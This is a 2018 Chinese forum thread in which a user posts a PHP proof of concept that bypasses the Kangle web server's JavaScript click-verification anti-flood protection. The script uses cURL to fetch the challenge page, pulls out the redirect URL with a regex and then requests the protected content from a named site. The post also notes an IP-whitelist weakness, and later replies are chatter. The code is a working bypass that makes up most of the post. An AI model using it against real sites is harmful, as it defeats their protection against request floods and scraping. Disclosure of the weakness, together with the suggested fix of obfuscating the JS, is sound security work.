kangle防cc JS点击验证绕过过程 poc

tting · 发表于 2018-12-26 22:05:14

Kangle默认的点击验证很简单通过正则匹配即可完全bypass 其次kangle存在ip白名单如短时间内通过一次验证则无需cookie也可直接访问网站内容

贴上POC

$value) {
if ($urlencode) {
$temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’;
} else {
$temp .= $key . ‘=’ . $value . ‘&’;
}
}
$requestData = substr($temp, 0, strlen($temp) – 1);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
}

$result = curl_exec($ch);

curl_close($ch);

return $result;
}

function isSafe($html)
{
return preg_match(‘/安全防护系统/’, $html) == 1;
}

function getSafeUrl($cookie_jar,$url)
{
$data = curl($cookie_jar,$url);

if (isSafe($data)) {
preg_match(‘/location.href =(.+);/’, $data, $result);
if (count($result) == 2) {
$result = $result[1];
$result = preg_replace(‘/”|\+/’, ”, $result);
$result = preg_replace(‘/\s/’, ”, $result);
return $url . $result;
}
}
return ”;
}
echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.wafcloud.net/”));

tting · 发表于 2018-12-26 22:06:23

防御方式也很简单最起码js稍微混淆一下。

coolday · 发表于 2018-12-26 22:17:52

很少人用kangle了吧

luckyroach · 发表于 2018-12-26 22:20:25

小奶狗发表于 2018-12-26 22:23

小樱早就写出来了，加个注悉就很6吗
小樱是谁？

小奶狗 · 发表于 2018-12-26 22:23:27

"

小樱都不认识啊，玩Kangle最溜的那个，itzmx。你是发福吗。

tting · 发表于 2018-12-27 00:14:30

Titan 发表于 2019-1-13 22:52

小樱都不认识啊，玩Kangle最溜的那个，itzmx。你是发福吗。
不用kangle啊。。

		自动登录	找回密码
密码			立即注册

kangle防cc JS点击验证 绕过过程 poc

浏览过的版块

kangle防cc JS点击验证绕过过程 poc